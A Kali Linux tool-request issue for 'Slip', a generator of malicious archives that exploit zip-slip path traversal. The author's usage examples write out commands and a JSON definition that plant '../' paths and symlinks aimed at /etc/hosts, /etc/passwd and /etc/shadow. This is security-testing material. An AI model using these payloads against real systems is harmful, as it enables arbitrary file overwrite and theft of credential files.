View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0009165Kali LinuxNew Tool Requestspublic2025-05-09 16:032025-10-03 14:51
Reporter0xless Assigned To 
PrioritynormalSeverityminorReproducibilityhave not tried
Status newResolutionopen 
Summary0009165: Slip - create malicious archive files containing path traversal payloads. It supports zip, tar, 7z and zip-like
Description

Slip is a malicious archive generator to exploit path traversal vulnerabilities.

Version to be added: v1.0.0 (https://github.com/0xless/slip/releases/tag/v1.0.0)
Homepage: The project lives in https://github.com/0xless/slip
Download: Available on github at https://github.com/0xless/slip
Author: 0xless (Matteo Cosentino)
License: GPL 3.0
Description:
Slip makes it easy to create multiple archives containing path traversal payloads in file name fields, rendering the extraction of the archive a potentially dangerous operation. With this approach it is possible to find and exploit "zip-slip" type vulnerabilities.

Motivation

Most commonly used tools rarely support path traversal payloads in archives, this makes it hard and time consuming to create malicious archives when attempting to find vulnerabilities in a software. With slip it's really convenient to create highly customizable archives that fit most situations.

Features

Slip is a feature rich script capable of satisfying most "zip-slip" hunting needs, in particular the script:

Supports zip, tar, 7z and zip-like (jar, war, apk, ipa, ...) archives
Allows to hunt for arbitrary file write and arbitrary file read vulnerabilities
Supports the generation of path traversal payloads to search for a file at different depths in the filesystem
Implements a massfind mode, that uses a payload dictionary to generate the archive
Allows cloning existing archives to add malicious payloads in more complex existing archives

Dependencies: python libraries py7zr==0.20.0, click

Similar tools: https://github.com/ptoomey3/evilarc seem to be the most known tool for the job.

Activity: Tool development started a couple of years ago. There are a few planned features to be added, but I just released the first stable version. I'm the maintainer of the repo and I'm available to fix bugs.

How to install:
Get release v1.0.0 at https://github.com/0xless/slip/archive/refs/tags/v1.0.0.zip
Extract archive and install requirements with python3 -m pip install -r requirements.txt it will install py7zr==0.20.0, click.
Other libraries should already be available on the system.

How to use:
Usage example

Create a tar.bz2 archive containing 2 explicit paths:

python3 slip.py --archive-type tar --compression bzip2 --paths "../etc/hosts, ../../etc/hosts" --file-content "foo" archive.tar

Create a zip archive containing an explicit path and an explicit symlink:

python3 slip.py --archive-type zip --compression deflate --paths "../etc/hosts" --symlinks "../etc/shadows" --file-content "foo" archive.zip

Create a 7z archive with a named symlink:

python3 slip.py --archive-type 7z --symlinks "../etc/hosts;linkname" archive.7z

This technique is really useful in case directory traversal payloads are filtered in paths but not in symlink, as it would be possible to achieve an arbitrary write file referring to the named symlink as parth of the path (e.g. symlink: ../etc/;foo, path: foo/hosts).

Create an archive from an existing one and add a new payload:

python3 slip.py --clone source.7z --paths "foo" --file-content "bar" archive.7z

Create an archive from a JSON file and add new payloads:

python3 slip.py --json-file definition.json --paths "foo0,bar00" --symlinks "/etc/passwd,/etc/shadow" --file-content "buzz" archive.zip

With definition.json containing:

[
{
"file-name": "../foo1",
"content":"bar",
"type":"path"
},
{
"file-name": "../../foo2",
"content":"bar",
"type":"path"
},
{
"file-name": "/etc/passwd;foo3",
"content":"IGNORED",
"type":"symlink"
},
{
"file-name": "foo4",
"content":"Y2lhbwo=",
"base64": true,
"type":"path"
}
]

Supported fields are file-name, content, base64, type. If base64 is specified, content will be decoded form base64. type can only be path or symlink.

Create a tar.bz2 archive with 4 payloads to search for "config.ini" at 3 different depths (it also uses Windows flavor dot dot slash):

python3 slip.py --archive-type tar --compression bzip2 --paths "config.ini" --search 3 --dotdotslash "..\" --file-content "foo" archive.tar

The archive will contain:

config.ini
..\config.ini
....\config.ini
......\config.ini

NOTE: --search does not support named symlink usage to prevent named symlinks from overwriting eachother.

Create a tar archive with payloads from the default mass-find dictionary to find the /etc/host/ file:

python3 slip.py --archive-type tar --mass-find "/etc/hosts" --mass-find-mode symlinks archive.tar

Packaged: The tool is not already packaged for debian

Activities

There are no notes attached to this issue.

Issue History

Date Modified Username Field Change
2025-05-09 16:03 0xless New Issue
2025-05-12 12:06 g0tmi1k Summary Slip is a CLI tool to create malicious archive files containing path traversal payloads. It supports zip, tar, 7z and zip-like ( => Slip - create malicious archive files containing path traversal payloads. It supports zip, tar, 7z and zip-like
2025-10-03 14:51 g0tmi1k View Status private => public